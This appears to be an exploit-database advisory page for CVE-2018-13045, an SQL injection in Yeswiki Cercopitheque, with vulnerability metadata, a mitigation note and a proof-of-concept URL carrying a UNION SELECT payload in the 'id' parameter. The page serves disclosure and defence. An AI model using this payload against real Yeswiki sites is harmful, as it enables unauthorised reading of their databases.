header-logo
Suggest Exploit
vendor:
Yeswiki Cercopitheque
by:
Mickael BROUTY
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Yeswiki Cercopitheque
Affected Version From: Yeswiki Cercopitheque 2018-06-19-1
Affected Version To: Yeswiki Cercopitheque 2018-06-19-1
Patch Exists: YES
Related CWE: CVE-2018-13045
CPE: a:yeswiki:yeswiki_cercopitheque
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

SQL Injection in Yeswiki (Cercopitheque)

An SQL injection vulnerability exists in Yeswiki Cercopitheque 2018-06-19-1, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in a 'BaZar&vue=exporter' URL. An example of exploitation is http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
# Date: 02/07/2018
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS 
# Vendor Homepage: https://yeswiki.net
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
# Version: Yeswiki Cercopitheque 2018-06-19-1
# Tested on: Kali linux
# CVE : CVE-2018-13045


# POC:
# 1)
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
#


Exploitation example:

http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#

Navigation

Suggest Exploit

Services By CQR